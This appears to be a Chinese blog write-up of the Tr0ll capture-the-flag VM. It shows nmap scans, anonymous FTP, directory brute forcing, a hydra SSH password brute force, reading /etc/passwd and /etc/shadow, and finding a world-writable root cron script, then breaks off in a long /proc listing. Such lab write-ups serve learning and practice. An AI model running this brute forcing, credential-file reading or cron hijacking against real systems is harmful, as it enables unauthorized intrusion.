Tr0ll
|
784
|
0

1933 字
|
1.3 小时

Tr0ll

主机发现

nmap -sn 192.168.65.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-17 14:43 中国标准时间
Nmap scan report for 192.168.65.1
Host is up (0.0020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.0019s latency).
MAC Address: 00:50:56:EB:B8:29 (VMware)
Nmap scan report for 192.168.65.136
Host is up (0.0030s latency).
MAC Address: 00:0C:29:AA:7E:29 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0013s latency).
MAC Address: 00:50:56:FD:72:65 (VMware)
Nmap scan report for 192.168.65.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.17 seconds

端口扫描

nmap --min-rate 10000 -p- 192.168.65.136 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-17 14:43 中国标准时间
Nmap scan report for 192.168.65.136
Host is up (0.0019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:AA:7E:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.73 seconds

TCP

nmap -sT -sV -sC -O -p80 192.168.65.136 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-17 14:44 中国标准时间
Nmap scan report for 192.168.65.136
Host is up (0.00072s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/secret
MAC Address: 00:0C:29:AA:7E:29 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds

UDP

nmap -sU -p80 192.168.65.136 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-17 14:45 中国标准时间
Nmap scan report for 192.168.65.136
Host is up (0.00013s latency).

PORT   STATE  SERVICE
80/udp closed http
MAC Address: 00:0C:29:AA:7E:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

Nmap漏洞扫描

nmap --script=vuln -p 80,21,22 192.168.65.136 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-17 15:12 中国标准时间
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.65.136
Host is up (0.0010s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
MAC Address: 00:0C:29:AA:7E:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 345.76 seconds

渗透思路

FTP

有FTP服务,直接尝试匿名登录

ftp 192.168.65.136
连接到 192.168.65.136。
220 (vsFTPd 3.0.2)
200 Always in UTF8 mode.
用户(192.168.65.136:(none)): anonymous
331 Please specify the password.
密码:
230 Login successful.
ftp>

信息搜集

ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp: 收到 69 字节,用时 0.00秒 69000.00千字节/秒。
ftp> mget lol.pcap
200 Switching to ASCII mode.
mget lol.pcap?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
ftp: 收到 8068 字节,用时 0.00秒 8068000.00千字节/秒。
ftp>

拿到lol.pacp文件,wireshark看看

下载了一个文件secret_stuff.txt,内容如下

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

Web渗透

HTTP服务访问

最开始nmap扫出有robots.txt路径,访问看看

curl http://192.168.65.136/robots.txt

StatusCode        : 200
StatusDescription : OK
Content           : User-agent:*
                    Disallow: /secret

RawContent        : HTTP/1.1 200 OK
                    Accept-Ranges: bytes
                    Content-Length: 31
                    Content-Type: text/plain
                    Date: Wed, 17 Jan 2024 06:56:57 GMT
                    ETag: "1f-500436d776b3c"
                    Last-Modified: Sun, 10 Aug 2014 09:54:42 GMT
                    Server...
Forms             : {}
Headers           : {[Accept-Ranges, bytes], [Content-Length, 31], [Content-Type, text/plain], [Date, Wed, 17 Jan 2024
                    06:56:57 GMT]...}
https://static.2ephyr.icu/blog            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : System.__ComObject
RawContentLength  : 31

多个/secret路径,随手访问看下

目录爆破

没啥收获,扫个目录看看

gobuster dir -u http://192.168.65.136 --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/19 11:12:06 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 316] [--> http://192.168.65.136/secret/]
/server-status        (Status: 403) [Size: 294]
Progress: 23189 / 62285 (37.23%)[ERROR] 2024/01/19 11:12:10 [!] parse "http://192.168.65.136/error\x1f_log": net/url: invalid control character in URL
Progress: 60226 / 62285 (96.69%)
===============================================================
2024/01/19 11:12:16 Finished
===============================================================

没有可用目录,尝试拼接从FTP中拿到信息sup3rs3cr3tdirlol

file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

32位可执行程序,执行看看结果

./roflmao
Find address 0x0856BF to proceed

用IDA看看

粗略查看没发现溢出点什么的,把这个地址拼接到URL上试试

各有一个文件,下载下来打开看看

cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
cat Pass.txt
Good_job_:)

which_one_lol.txt看起来像用户名,扒下来当字典

cewl http://192.168.65.136/0x0856BF/good_luck/which_one_lol.txt -w username.txt

同样把Pass.txt扒下来做密码

cewl http://192.168.65.136/0x0856BF/this_folder_contains_the_password/Pass.txt -w password.txt

SSH爆破

hydra -L username.txt -P password.txt 192.168.65.136 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-19 15:15:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:14/p:2), ~2 tries per task
[DATA] attacking ssh://192.168.65.136:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-19 15:16:34

没有结果,把文件名也手动添加进去

cat username.txt
which_one_lol.txt
maleus
aux
felux
Eagle
genphlux
Definitely
not
this
one
usmc
blawrg
wytshadow
vis
overflow
cat password.txt
Pass.txt
job
Good

再次爆破

hydra -L username.txt -P password.txt 192.168.65.136 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-19 15:19:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 45 login tries (l:15/p:3), ~3 tries per task
[DATA] attacking ssh://192.168.65.136:22/
[STATUS] 60.00 tries/min, 60 tries in 00:01h, 14 to do in 00:01h, 16 active
[22][ssh] host: 192.168.65.136   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-19 15:20:13

破解出一个个账号密码overflow:Pass.txt

ssh overflow@192.168.65.136
overflow@192.168.65.136's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$

登录成功

主机信息搜集

$ whoami
overflow
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ sudo -l
sudo: unable to resolve host troll
[sudo] password for overflow:
Sorry, user overflow may not run sudo on troll.
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
troll:x:1000:1000:Tr0ll,,,:/home/troll:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:104:112:ftp daemon,,,:/srv/ftp:/bin/false
lololol:x:1001:1001::/home/lololol:
overflow:x:1002:1002::/home/overflow:
ps-aux:x:1003:1003::/home/ps-aux:
maleus:x:1004:1004::/home/maleus:
felux:x:1005:1005::/home/felux:
Eagle11:x:1006:1006::/home/Eagle11:
genphlux:x:1007:1007::/home/genphlux:
usmc8892:x:1008:1008::/home/usmc8892:
blawrg:x:1009:1009::/home/blawrg:
wytshadow:x:1010:1010::/home/wytshadow:
vis1t0r:x:1011:1011::/home/vis1t0r:
$ cat /etc/shadow
cat: /etc/shadow: Permission denied
$ cat /etc/crontab
cat: /etc/crontab: Permission denied
$ cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014
$
Could not chdir to home directory /home/overflow: No such file or directory

Broadcast Message from root@trol
        (somewhere) at 18:25 ...

TIMES UP LOL!

Connection to 192.168.65.136 closed by remote host.
Connection to 192.168.65.136 closed.

挂了会机的时间终端自动退出了,查看定时任务没有权限,重新登录,尝试查看定时任务日志文件

ssh overflow@192.168.65.136
overflow@192.168.65.136's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jan 22 18:23:45 2024 from 192.168.65.128
Could not chdir to home directory /home/overflow: No such file or directory
$ python -c "import pty;pty.spawn('/bin/bash')"
overflow@troll:/$ find / -name cronlog 2>/dev/null
/var/log/cronlog
overflow@troll:/$

有收获

overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py
overflow@troll:/$ find / -name cleaner.py 2>/dev/null
/lib/log/cleaner.py
overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()
overflow@troll:/$ ls -liah /lib/log/cleaner.py
155826 -rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py

枚举所有可写入和执行权限的文件

overflow@troll:/$ find / -perm -o+w -type f 2> /dev/null | grep /proc -v
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/6.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py

枚举所有可写入权限的文件

find / -writable 2>/dev/null
/tmp
/run/dbus/system_bus_socket
/run/user/1002
/run/shm
/run/lock
/srv/ftp/lol.pcap
/var/tmp
/var/tmp/cleaner.py.swp
/var/lock
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/4.session
/sys/fs/cgroup/systemd/user/1002.user/4.session/tasks
/sys/fs/cgroup/systemd/user/1002.user/4.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/4.session/cgroup.procs
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.null
/sys/kernel/security/apparmor/.access
/proc/sys/kernel/ns_last_pid
/proc/1/task/1/attr/current
/proc/1/task/1/attr/exec
/proc/1/task/1/attr/fscreate
/proc/1/task/1/attr/keycreate
/proc/1/task/1/attr/sockcreate
/proc/1/attr/current
/proc/1/attr/exec
/proc/1/attr/fscreate
/proc/1/attr/keycreate
/proc/1/attr/sockcreate
/proc/2/task/2/attr/current
/proc/2/task/2/attr/exec
/proc/2/task/2/attr/fscreate
/proc/2/task/2/attr/keycreate
/proc/2/task/2/attr/sockcreate
/proc/2/attr/current
/proc/2/attr/exec
/proc/2/attr/fscreate
/proc/2/attr/keycreate
/proc/2/attr/sockcreate
/proc/3/task/3/attr/current
/proc/3/task/3/attr/exec
/proc/3/task/3/attr/fscreate
/proc/3/task/3/attr/keycreate
/proc/3/task/3/attr/sockcreate
/proc/3/attr/current
/proc/3/attr/exec
/proc/3/attr/fscreate
/proc/3/attr/keycreate
/proc/3/attr/sockcreate
/proc/5/task/5/attr/current
/proc/5/task/5/attr/exec
/proc/5/task/5/attr/fscreate
/proc/5/task/5/attr/keycreate
/proc/5/task/5/attr/sockcreate
/proc/5/attr/current
/proc/5/attr/exec
/proc/5/attr/fscreate
/proc/5/attr/keycreate
/proc/5/attr/sockcreate
/proc/6/task/6/attr/current
/proc/6/task/6/attr/exec
/proc/6/task/6/attr/fscreate
/proc/6/task/6/attr/keycreate
/proc/6/task/6/attr/sockcreate
/proc/6/attr/current
/proc/6/attr/exec
/proc/6/attr/fscreate
/proc/6/attr/keycreate
/proc/6/attr/sockcreate
/proc/7/task/7/attr/current
/proc/7/task/7/attr/exec
/proc/7/task/7/attr/fscreate
/proc/7/task/7/attr/keycreate
/proc/7/task/7/attr/sockcreate
/proc/7/attr/current
/proc/7/attr/exec
/proc/7/attr/fscreate
/proc/7/attr/keycreate
/proc/7/attr/sockcreate
/proc/8/task/8/attr/current
/proc/8/task/8/attr/exec
/proc/8/task/8/attr/fscreate
/proc/8/task/8/attr/keycreate
/proc/8/task/8/attr/sockcreate
/proc/8/attr/current
/proc/8/attr/exec
/proc/8/attr/fscreate
/proc/8/attr/keycreate
/proc/8/attr/sockcreate
/proc/9/task/9/attr/current
/proc/9/task/9/attr/exec
/proc/9/task/9/attr/fscreate
/proc/9/task/9/attr/keycreate
/proc/9/task/9/attr/sockcreate
/proc/9/attr/current
/proc/9/attr/exec
/proc/9/attr/fscreate
/proc/9/attr/keycreate
/proc/9/attr/sockcreate
/proc/10/task/10/attr/current
/proc/10/task/10/attr/exec
/proc/10/task/10/attr/fscreate
/proc/10/task/10/attr/keycreate
/proc/10/task/10/attr/sockcreate
/proc/10/attr/current
/proc/10/attr/exec
/proc/10/attr/fscreate
/proc/10/attr/keycreate
/proc/10/attr/sockcreate
/proc/11/task/11/attr/current
/proc/11/task/11/attr/exec
/proc/11/task/11/attr/fscreate
/proc/11/task/11/attr/keycreate
/proc/11/task/11/attr/sockcreate
/proc/11/attr/current
/proc/11/attr/exec
/proc/11/attr/fscreate
/proc/11/attr/keycreate
/proc/11/attr/sockcreate
/proc/12/task/12/attr/current
/proc/12/task/12/attr/exec
/proc/12/task/12/attr/fscreate
/proc/12/task/12/attr/keycreate
/proc/12/task/12/attr/sockcreate
/proc/12/attr/current
/proc/12/attr/exec
/proc/12/attr/fscreate
/proc/12/attr/keycreate
/proc/12/attr/sockcreate
/proc/13/task/13/attr/current
/proc/13/task/13/attr/exec
/proc/13/task/13/attr/fscreate
/proc/13/task/13/attr/keycreate
/proc/13/task/13/attr/sockcreate
/proc/13/attr/current
/proc/13/attr/exec
/proc/13/attr/fscreate
/proc/13/attr/keycreate
/proc/13/attr/sockcreate
/proc/14/task/14/attr/current
/proc/14/task/14/attr/exec
/proc/14/task/14/attr/fscreate
/proc/14/task/14/attr/keycreate
/proc/14/task/14/attr/sockcreate
/proc/14/attr/current
/proc/14/attr/exec
/proc/14/attr/fscreate
/proc/14/attr/keycreate
/proc/14/attr/sockcreate
/proc/15/task/15/attr/current
/proc/15/task/15/attr/exec
/proc/15/task/15/attr/fscreate
/proc/15/task/15/attr/keycreate
/proc/15/task/15/attr/sockcreate
/proc/15/attr/current
/proc/15/attr/exec
/proc/15/attr/fscreate
/proc/15/attr/keycreate
/proc/15/attr/sockcreate
/proc/16/task/16/attr/current
/proc/16/task/16/attr/exec
/proc/16/task/16/attr/fscreate
/proc/16/task/16/attr/keycreate
/proc/16/task/16/attr/sockcreate
/proc/16/attr/current
/proc/16/attr/exec
/proc/16/attr/fscreate
/proc/16/attr/keycreate
/proc/16/attr/sockcreate
/proc/17/task/17/attr/current
/proc/17/task/17/attr/exec
/proc/17/task/17/attr/fscreate
/proc/17/task/17/attr/keycreate
/proc/17/task/17/attr/sockcreate
/proc/17/attr/current
/proc/17/attr/exec
/proc/17/attr/fscreate
/proc/17/attr/keycreate
/proc/17/attr/sockcreate
/proc/18/task/18/attr/current
/proc/18/task/18/attr/exec
/proc/18/task/18/attr/fscreate
/proc/18/task/18/attr/keycreate
/proc/18/task/18/attr/sockcreate
/proc/18/attr/current
/proc/18/attr/exec
/proc/18/attr/fscreate
/proc/18/attr/keycreate
/proc/18/attr/sockcreate
/proc/19/task/19/attr/current
/proc/19/task/19/attr/exec
/proc/19/task/19/attr/fscreate
/proc/19/task/19/attr/keycreate
/proc/19/task/19/attr/sockcreate
/proc/19/attr/current
/proc/19/attr/exec
/proc/19/attr/fscreate
/proc/19/attr/keycreate
/proc/19/attr/sockcreate
/proc/20/task/20/attr/current
/proc/20/task/20/attr/exec
/proc/20/task/20/attr/fscreate
/proc/20/task/20/attr/keycreate
/proc/20/task/20/attr/sockcreate
/proc/20/attr/current
/proc/20/attr/exec
/proc/20/attr/fscreate
/proc/20/attr/keycreate
/proc/20/attr/sockcreate
/proc/21/task/21/attr/current
/proc/21/task/21/attr/exec
/proc/21/task/21/attr/fscreate
/proc/21/task/21/attr/keycreate
/proc/21/task/21/attr/sockcreate
/proc/21/attr/current
/proc/21/attr/exec
/proc/21/attr/fscreate
/proc/21/attr/keycreate
/proc/21/attr/sockcreate
/proc/22/task/22/attr/current
/proc/22/task/22/attr/exec
/proc/22/task/22/attr/fscreate
/proc/22/task/22/attr/keycreate
/proc/22/task/22/attr/sockcreate
/proc/22/attr/current
/proc/22/attr/exec
/proc/22/attr/fscreate
/proc/22/attr/keycreate
/proc/22/attr/sockcreate
/proc/23/task/23/attr/current
/proc/23/task/23/attr/exec
/proc/23/task/23/attr/fscreate
/proc/23/task/23/attr/keycreate
/proc/23/task/23/attr/sockcreate
/proc/23/attr/current
/proc/23/attr/exec
/proc/23/attr/fscreate
/proc/23/attr/keycreate
/proc/23/attr/sockcreate
/proc/25/task/25/attr/current
/proc/25/task/25/attr/exec
/proc/25/task/25/attr/fscreate
/proc/25/task/25/attr/keycreate
/proc/25/task/25/attr/sockcreate
/proc/25/attr/current
/proc/25/attr/exec
/proc/25/attr/fscreate
/proc/25/attr/keycreate
/proc/25/attr/sockcreate
/proc/26/task/26/attr/current
/proc/26/task/26/attr/exec
/proc/26/task/26/attr/fscreate
/proc/26/task/26/attr/keycreate
/proc/26/task/26/attr/sockcreate
/proc/26/attr/current
/proc/26/attr/exec
/proc/26/attr/fscreate
/proc/26/attr/keycreate
/proc/26/attr/sockcreate
/proc/27/task/27/attr/current
/proc/27/task/27/attr/exec
/proc/27/task/27/attr/fscreate
/proc/27/task/27/attr/keycreate
/proc/27/task/27/attr/sockcreate
/proc/27/attr/current
/proc/27/attr/exec
/proc/27/attr/fscreate
/proc/27/attr/keycreate
/proc/27/attr/sockcreate
/proc/28/task/28/attr/current
/proc/28/task/28/attr/exec
/proc/28/task/28/attr/fscreate
/proc/28/task/28/attr/keycreate
/proc/28/task/28/attr/sockcreate
/proc/28/attr/current
/proc/28/attr/exec
/proc/28/attr/fscreate
/proc/28/attr/keycreate
/proc/28/attr/sockcreate
/proc/29/task/29/attr/current
/proc/29/task/29/attr/exec
/proc/29/task/29/attr/fscreate
/proc/29/task/29/attr/keycreate
/proc/29/task/29/attr/sockcreate
/proc/29/attr/current
/proc/29/attr/exec
/proc/29/attr/fscreate
/proc/29/attr/keycreate
/proc/29/attr/sockcreate
/proc/30/task/30/attr/current
/proc/30/task/30/attr/exec
/proc/30/task/30/attr/fscreate
/proc/30/task/30/attr/keycreate
/proc/30/task/30/attr/sockcreate
/proc/30/attr/current
/proc/30/attr/exec
/proc/30/attr/fscreate
/proc/30/attr/keycreate
/proc/30/attr/sockcreate
/proc/42/task/42/attr/current
/proc/42/task/42/attr/exec
/proc/42/task/42/attr/fscreate
/proc/42/task/42/attr/keycreate
/proc/42/task/42/attr/sockcreate
/proc/42/attr/current
/proc/42/attr/exec
/proc/42/attr/fscreate
/proc/42/attr/keycreate
/proc/42/attr/sockcreate
/proc/44/task/44/attr/current
/proc/44/task/44/attr/exec
/proc/44/task/44/attr/fscreate
/proc/44/task/44/attr/keycreate
/proc/44/task/44/attr/sockcreate
/proc/44/attr/current
/proc/44/attr/exec
/proc/44/attr/fscreate
/proc/44/attr/keycreate
/proc/44/attr/sockcreate
/proc/45/task/45/attr/current
/proc/45/task/45/attr/exec
/proc/45/task/45/attr/fscreate
/proc/45/task/45/attr/keycreate
/proc/45/task/45/attr/sockcreate
/proc/45/attr/current
/proc/45/attr/exec
/proc/45/attr/fscreate
/proc/45/attr/keycreate
/proc/45/attr/sockcreate
/proc/46/task/46/attr/current
/proc/46/task/46/attr/exec
/proc/46/task/46/attr/fscreate
/proc/46/task/46/attr/keycreate
/proc/46/task/46/attr/sockcreate
/proc/46/attr/current
/proc/46/attr/exec
/proc/46/attr/fscreate
/proc/46/attr/keycreate
/proc/46/attr/sockcreate
/proc/67/task/67/attr/current
/proc/67/task/67/attr/exec
/proc/67/task/67/attr/fscreate
/proc/67/task/67/attr/keycreate
/proc/67/task/67/attr/sockcreate
/proc/67/attr/current
/proc/67/attr/exec
/proc/67/attr/fscreate
/proc/67/attr/keycreate
/proc/67/attr/sockcreate
/proc/68/task/68/attr/current
/proc/68/task/68/attr/exec
/proc/68/task/68/attr/fscreate
/proc/68/task/68/attr/keycreate
/proc/68/task/68/attr/sockcreate
/proc/68/attr/current
/proc/68/attr/exec
/proc/68/attr/fscreate
/proc/68/attr/keycreate
/proc/68/attr/sockcreate
/proc/106/task/106/attr/current
/proc/106/task/106/attr/exec
/proc/106/task/106/attr/fscreate
/proc/106/task/106/attr/keycreate
/proc/106/task/106/attr/sockcreate
/proc/106/attr/current
/proc/106/attr/exec
/proc/106/attr/fscreate
/proc/106/attr/keycreate
/proc/106/attr/sockcreate
/proc/110/task/110/attr/current
/proc/110/task/110/attr/exec
/proc/110/task/110/attr/fscreate
/proc/110/task/110/attr/keycreate
/proc/110/task/110/attr/sockcreate
/proc/110/attr/current
/proc/110/attr/exec
/proc/110/attr/fscreate
/proc/110/attr/keycreate
/proc/110/attr/sockcreate
/proc/114/task/114/attr/current
/proc/114/task/114/attr/exec
/proc/114/task/114/attr/fscreate
/proc/114/task/114/attr/keycreate
/proc/114/task/114/attr/sockcreate
/proc/114/attr/current
/proc/114/attr/exec
/proc/114/attr/fscreate
/proc/114/attr/keycreate
/proc/114/attr/sockcreate
/proc/123/task/123/attr/current
/proc/123/task/123/attr/exec
/proc/123/task/123/attr/fscreate
/proc/123/task/123/attr/keycreate
/proc/123/task/123/attr/sockcreate
/proc/123/attr/current
/proc/123/attr/exec
/proc/123/attr/fscreate
/proc/123/attr/keycreate
/proc/123/attr/sockcreate
/proc/124/task/124/attr/current
/proc/124/task/124/attr/exec
/proc/124/task/124/attr/fscreate
/proc/124/task/124/attr/keycreate
/proc/124/task/124/attr/sockcreate
/proc/124/attr/current
/proc/124/attr/exec
/proc/124/attr/fscreate
/proc/124/attr/keycreate
/proc/124/attr/sockcreate
/proc/133/task/133/attr/current
/proc/133/task/133/attr/exec
/proc/133/task/133/attr/fscreate
/proc/133/task/133/attr/keycreate
/proc/133/task/133/attr/sockcreate
/proc/133/attr/current
/proc/133/attr/exec
/proc/133/attr/fscreate
/proc/133/attr/keycreate
/proc/133/attr/sockcreate
/proc/134/task/134/attr/current
/proc/134/task/134/attr/exec
/proc/134/task/134/attr/fscreate
/proc/134/task/134/attr/keycreate
/proc/134/task/134/attr/sockcreate
/proc/134/attr/current
/proc/134/attr/exec
/proc/134/attr/fscreate
/proc/134/attr/keycreate
/proc/134/attr/sockcreate
/proc/260/task/260/attr/current
/proc/260/task/260/attr/exec
/proc/260/task/260/attr/fscreate
/proc/260/task/260/attr/keycreate
/proc/260/task/260/attr/sockcreate
/proc/260/attr/current
/proc/260/attr/exec
/proc/260/attr/fscreate
/proc/260/attr/keycreate
/proc/260/attr/sockcreate
/proc/268/task/268/attr/current
/proc/268/task/268/attr/exec
/proc/268/task/268/attr/fscreate
/proc/268/task/268/attr/keycreate
/proc/268/task/268/attr/sockcreate
/proc/268/attr/current
/proc/268/attr/exec
/proc/268/attr/fscreate
/proc/268/attr/keycreate
/proc/268/attr/sockcreate
/proc/331/task/331/attr/current
/proc/331/task/331/attr/exec
/proc/331/task/331/attr/fscreate
/proc/331/task/331/attr/keycreate
/proc/331/task/331/attr/sockcreate
/proc/331/attr/current
/proc/331/attr/exec
/proc/331/attr/fscreate
/proc/331/attr/keycreate
/proc/331/attr/sockcreate
/proc/354/task/354/attr/current
/proc/354/task/354/attr/exec
/proc/354/task/354/attr/fscreate
/proc/354/task/354/attr/keycreate
/proc/354/task/354/attr/sockcreate
/proc/354/attr/current
/proc/354/attr/exec
/proc/354/attr/fscreate
/proc/354/attr/keycreate
/proc/354/attr/sockcreate
/proc/356/task/356/attr/current
/proc/356/task/356/attr/exec
/proc/356/task/356/attr/fscreate
/proc/356/task/356/attr/keycreate
/proc/356/task/356/attr/sockcreate
/proc/356/attr/current
/proc/356/attr/exec
/proc/356/attr/fscreate
/proc/356/attr/keycreate
/proc/356/attr/sockcreate
/proc/363/task/363/attr/current
/proc/363/task/363/attr/exec
/proc/363/task/363/attr/fscreate
/proc/363/task/363/attr/keycreate
/proc/363/task/363/attr/sockcreate
/proc/363/task/364/attr/current
/proc/363/task/364/attr/exec
